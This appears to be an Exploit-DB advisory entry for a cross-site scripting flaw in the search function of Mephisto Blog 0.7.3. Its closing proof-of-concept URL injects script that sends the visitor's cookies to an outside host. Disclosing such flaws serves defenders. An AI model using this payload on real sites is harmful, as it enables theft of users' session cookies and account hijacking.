Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting

EDB-ID:

29780




Platform:

PHP

Date:

2007-03-26


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

source: https://www.securityfocus.com/bid/23141/info

Mephisto Blog is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Mephisto Blog version 0.7.3 is vulnerable to this issue; other versions may also be affected.

http://www.example.com/search?q="/><script>window.location="http://www.example2.com/script.php?data="+document.cookie</script>